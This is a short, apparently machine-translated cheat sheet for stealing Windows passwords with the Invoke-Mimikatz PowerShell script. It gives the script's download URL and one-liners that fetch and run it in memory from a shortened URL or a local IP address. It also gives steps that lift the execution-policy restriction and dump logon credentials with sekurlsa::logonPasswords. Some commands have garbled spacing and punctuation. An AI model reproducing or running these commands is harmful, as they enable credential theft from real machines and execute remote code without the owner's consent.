Invoke-Mimikatz.ps1 acquires the system password
(1) Invoke-Mimikatz.ps1 download address
Https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
(2) have the network environment to execute orders directly.
Powershell "IEX (New-Object Net.WebClient) .DownloadString ('http://is.gd/oeoFuI'); Invoke-Mimikatz-DumpCreds"
(3) Local network environment
Powershell "IEX (New-Object Net.WebClient) .DownloadString ('http://192.168.1.1/');Invoke-Mimikatz-DumpCreds"
(4) download local execution
In a word:
Powershell Import-Module.\ Invoke-Mimikatz.ps1;Invoke-Mimikatz-Command'"privilege::debug"sekurlsa::logonPasswords full"'
Subject to authorization restrictions:
Get-ExecutionPolicy / / result shows restricted
Set-ExecutionPolicy Unrestricted / / Open restrictions
Import-Module.\ Invoke-Mimikatz.ps1 / / Import command
Invoke-Mimikatz-Command'"privilege::debug"sekurlsa::logonPasswords full" / / get the password